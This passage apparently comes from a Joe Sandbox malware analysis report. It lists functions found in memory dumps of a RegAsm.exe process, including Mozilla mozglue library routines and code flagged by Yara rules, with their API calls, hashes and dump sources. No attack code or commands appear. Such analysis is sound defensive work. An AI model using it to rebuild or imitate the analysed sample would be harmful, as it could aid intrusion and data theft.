                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _getpidstrlenstrncmptolower
                                                                                    • String ID: pid:
                                                                                    • API String ID: 1720406129-3403741246
                                                                                    • Opcode ID: 578de043bc189f953e9b011d4b93cfa6e2a7c9c8b97ac8c6192858bebd1afd38
                                                                                    • Instruction ID: 57451e8c32362852b8634e5dfd6271a92c7e209f7e3058e80370728dfe1efed8
                                                                                    • Opcode Fuzzy Hash: 578de043bc189f953e9b011d4b93cfa6e2a7c9c8b97ac8c6192858bebd1afd38
                                                                                    • Instruction Fuzzy Hash: 7231F231A026089BDB00DFA9DC91AAFBBB5FF8531CF540529D81167F41E732A849CBA1
                                                                                    Function 6CC7E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7E577
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E584
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E5DE
                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC7E8A6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                    • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                    • API String ID: 1483687287-53385798
                                                                                    • Opcode ID: f6009b2a5954c8774ac28983fc51b33b247420d649fbd0d0696e22931075282e
                                                                                    • Instruction ID: 577bab60484d38b7f04b2a318214369104046de84ddfa8fd9d6983a66c206d8f
                                                                                    • Opcode Fuzzy Hash: f6009b2a5954c8774ac28983fc51b33b247420d649fbd0d0696e22931075282e
                                                                                    • Instruction Fuzzy Hash: DD11A13AA04258DFCB109F98C488A5AFBB4FB89728F01051DF84557B50E774A805CFA9
                                                                                    Function 00410CAC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CB7
                                                                                    • HeapAlloc.KERNEL32(00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CBE
                                                                                    • wsprintfW.USER32 ref: 00410CCF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocProcesswsprintf
                                                                                    • String ID: %hs
                                                                                    • API String ID: 659108358-2783943728
                                                                                    • Opcode ID: 395bc16f8c9bdbf634976d61b22cc7b4631a25c0f429dc799fa7ba852be267f4
                                                                                    • Instruction ID: e5429f43cd492c04fed31fa47646dc7a773dda998c79e506addb4a7470e9706e
                                                                                    • Opcode Fuzzy Hash: 395bc16f8c9bdbf634976d61b22cc7b4631a25c0f429dc799fa7ba852be267f4
                                                                                    • Instruction Fuzzy Hash: 01D0A73174022477C62027E4BD0FF667F1CEB05BA6F800031FB0DD6151C9A1441187EE
                                                                                    Function 6CC80C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC80CD5
                                                                                      • Part of subcall function 6CC6F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC6F9A7
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC80D40
                                                                                    • free.MOZGLUE ref: 6CC80DCB
                                                                                      • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                                      • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                                      • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                                    • free.MOZGLUE ref: 6CC80DDD
                                                                                    • free.MOZGLUE ref: 6CC80DF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                    • String ID:
                                                                                    • API String ID: 4069420150-0
                                                                                    • Opcode ID: 52e6067700eda5f2aa6d35be30d7c2f8a70680f54f450037c0986779ab37e4d1
                                                                                    • Instruction ID: 1e4f297e14a28ca1f40f06ba4412f32bc7906c2847d014c800c1c5831b5ae8d6
                                                                                    • Opcode Fuzzy Hash: 52e6067700eda5f2aa6d35be30d7c2f8a70680f54f450037c0986779ab37e4d1
                                                                                    • Instruction Fuzzy Hash: A3411A71A0A7848BD320CF29C08079BFBE5BFC5758F518A2EE8D887751E770A445CB82
                                                                                    Function 6CC70800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC70838
                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6CC7084C
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CC708AF
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6CC708BD
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC708D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$memset
                                                                                    • String ID:
                                                                                    • API String ID: 837921583-0
                                                                                    • Opcode ID: b008cfe4aa988087f58539c963e756330ae642052d592b022067e3c10c3a95fb
                                                                                    • Instruction ID: 39ae6008f9ed7643583171aabc7496a9dcfe919a6608b4cbc146cc0712fa0887
                                                                                    • Opcode Fuzzy Hash: b008cfe4aa988087f58539c963e756330ae642052d592b022067e3c10c3a95fb
                                                                                    • Instruction Fuzzy Hash: FB21D3307002498BDF148FA5D899BAA73B9FF44708F50056CE509E7B41EF36A404CBE4
                                                                                    Function 6CC8CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8CDA4
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                      • Part of subcall function 6CC8D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CC8CDBA,00100000,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8D158
                                                                                      • Part of subcall function 6CC8D130: InitializeConditionVariable.KERNEL32(00000098,?,6CC8CDBA,00100000,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8D177
                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8CDC4
                                                                                      • Part of subcall function 6CC87480: ReleaseSRWLockExclusive.KERNEL32(?,6CC915FC,?,?,?,?,6CC915FC,?), ref: 6CC874EB
                                                                                    • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8CECC
                                                                                      • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                                      • Part of subcall function 6CC7CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CC8CEEA,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?,00000000), ref: 6CC7CB57
                                                                                      • Part of subcall function 6CC7CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CC7CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CC8CEEA,?,?), ref: 6CC7CBAF
                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8D058
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                    • String ID:
                                                                                    • API String ID: 861561044-0
                                                                                    • Opcode ID: 8c6d7a02d2532c262ac8904df474afb1b115183d4ed9a3890b872f5202e081f8
                                                                                    • Instruction ID: a4b3047f5ab0d4354d2a3f650595aede65e562d1021fb61ae604fd739148466b
                                                                                    • Opcode Fuzzy Hash: 8c6d7a02d2532c262ac8904df474afb1b115183d4ed9a3890b872f5202e081f8
                                                                                    • Instruction Fuzzy Hash: 51D16071A05B469FD708CF28C480B9AFBF1BF89308F01876DD95987711EB71A9A5CB81
                                                                                    Function 6CC41720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6CC417B2
                                                                                    • memset.VCRUNTIME140(?,00000000,?,?), ref: 6CC418EE
                                                                                    • free.MOZGLUE(?), ref: 6CC41911
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC4194C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 3725304770-0
                                                                                    • Opcode ID: 2d7263d7b430020b566c70d1ccaee9983a2c6cb00b4793a4f34d58ee3864294d
                                                                                    • Instruction ID: d1815c987ecd806101ffba3002799b50403689a775dde8e368535f40b8862961
                                                                                    • Opcode Fuzzy Hash: 2d7263d7b430020b566c70d1ccaee9983a2c6cb00b4793a4f34d58ee3864294d
                                                                                    • Instruction Fuzzy Hash: B581B070A112159FCB08CF6CD8949AEBBB1FF89314F04C52CE895AB750E730E864CBA1
                                                                                    Function 6CC55C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                                    • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                                    • __aulldiv.LIBCMT ref: 6CC55DB4
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC55DED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                    • String ID:
                                                                                    • API String ID: 557828605-0
                                                                                    • Opcode ID: fb93f8d1316a3be3696b68c7e631e39ab7f3b5c78c70a48caf83f2e50a23beb1
                                                                                    • Instruction ID: ca4236de6147bb88d128acd82141a990248519c5041f7350cf996e8fa2e56c25
                                                                                    • Opcode Fuzzy Hash: fb93f8d1316a3be3696b68c7e631e39ab7f3b5c78c70a48caf83f2e50a23beb1
                                                                                    • Instruction Fuzzy Hash: 2951907AE0011A8FCF08CFACC994AAEBBB1FF85304F19865DD811A7750D731A955CB94
                                                                                    Function 6CC3CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC3CEBD
                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CC3CEF5
                                                                                    • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CC3CF4E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 438689982-4108050209
                                                                                    • Opcode ID: 346e7f0041a2f42a33e9390969aef2173515be73669baf3dd8def197db56d1dd
                                                                                    • Instruction ID: 8ac224a142176f0fe784745d2793a67879c34ea292a3693b6c4ec1a3e5824e3b
                                                                                    • Opcode Fuzzy Hash: 346e7f0041a2f42a33e9390969aef2173515be73669baf3dd8def197db56d1dd
                                                                                    • Instruction Fuzzy Hash: 90511575A002668FCB00CF19D890A9AB7B5FF99304F19869DD8595F391E731ED06CBE0
                                                                                    Function 6CC977D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC977FA
                                                                                    • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6CC97829
                                                                                      • Part of subcall function 6CC6CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6CC331A7), ref: 6CC6CC45
                                                                                      • Part of subcall function 6CC6CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6CC331A7), ref: 6CC6CC4E
                                                                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CC9789F
                                                                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CC978CF
                                                                                      • Part of subcall function 6CC34DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC34E5A
                                                                                      • Part of subcall function 6CC34DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC34E97
                                                                                      • Part of subcall function 6CC34290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC73EBD,6CC73EBD,00000000), ref: 6CC342A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                                    • String ID:
                                                                                    • API String ID: 2525797420-0
                                                                                    • Opcode ID: 028e260e57d0adc0fbf3045243ea68f87063af387e23a36c59fe3969ad9770d5
                                                                                    • Instruction ID: 2dd5b361b5c0cff2c2a0cce4a73f8cb83eafe1ecb128bbca8c71ed04cbe70aca
                                                                                    • Opcode Fuzzy Hash: 028e260e57d0adc0fbf3045243ea68f87063af387e23a36c59fe3969ad9770d5
                                                                                    • Instruction Fuzzy Hash: 3A41AD71905B069FD300DF29D48056AFBF4FFCA254F204A2EE4A987740EB31D559CB92
                                                                                    Function 6CC76470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CC782BC,?,?), ref: 6CC7649B
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC764A9
                                                                                      • Part of subcall function 6CC6FA80: GetCurrentThreadId.KERNEL32 ref: 6CC6FA8D
                                                                                      • Part of subcall function 6CC6FA80: AcquireSRWLockExclusive.KERNEL32(6CCBF448), ref: 6CC6FA99
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC7653F
                                                                                    • free.MOZGLUE(?), ref: 6CC7655A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3596744550-0
                                                                                    • Opcode ID: f36dda54a260d58d2637ece7cc8a21b8859bc92fc86ee8e8daa082981bfa7170
                                                                                    • Instruction ID: 49e8e67bf02723a6240f7e2105daf02e09c3a1f18c1526096c8c75df20cbd06a
                                                                                    • Opcode Fuzzy Hash: f36dda54a260d58d2637ece7cc8a21b8859bc92fc86ee8e8daa082981bfa7170
                                                                                    • Instruction Fuzzy Hash: A3316FB5A047059FD740CF24D884A9ABBF4FF89314F00842EF85A97751EB34E919CB92
                                                                                    Function 004117C4 Relevance: 6.1, APIs: 4, Instructions: 92stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: strtok_s$H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 1158113254-0
                                                                                    • Opcode ID: feef1b78a247fc3fa4ddc29145ecb17a01c4799e19a08df0856dd8f06b3e7f82
                                                                                    • Instruction ID: 821aa8aa588a3267b2ec6a7890ee4fd3fa63f1983fa88147b3c87a48a22d2605
                                                                                    • Opcode Fuzzy Hash: feef1b78a247fc3fa4ddc29145ecb17a01c4799e19a08df0856dd8f06b3e7f82
                                                                                    • Instruction Fuzzy Hash: 1721C571600605AFCB18EFA1D9C1EFBB3ACEF18315B10853FE116D65A1DB38E985C658
                                                                                    Function 6CC6FF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?), ref: 6CC6FFD3
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?), ref: 6CC6FFF5
                                                                                    • free.MOZGLUE(?,?,?,?,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?), ref: 6CC7001B
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?), ref: 6CC7002A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                                    • String ID:
                                                                                    • API String ID: 826125452-0
                                                                                    • Opcode ID: 12b27162f1551ef2bc322ff715a8b29709eef8535d2be9cac9cbb668f7ec739c
                                                                                    • Instruction ID: bfafa36b646b16de20d7e3550097c6cee77d6c2926f041836281edc0c978bfff
                                                                                    • Opcode Fuzzy Hash: 12b27162f1551ef2bc322ff715a8b29709eef8535d2be9cac9cbb668f7ec739c
                                                                                    • Instruction Fuzzy Hash: 9D21F4B2A002155FC7189EAD98D48AEB7FAFB853243254738E425D7780FA71AD0286A1
                                                                                    Function 00411649 Relevance: 6.1, APIs: 4, Instructions: 78stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041164E
                                                                                    • strtok_s.MSVCRT ref: 00411675
                                                                                    • StrCmpCA.SHLWAPI(00000000,0042650C,00000001,?,?,?,00416DD9), ref: 004116B1
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
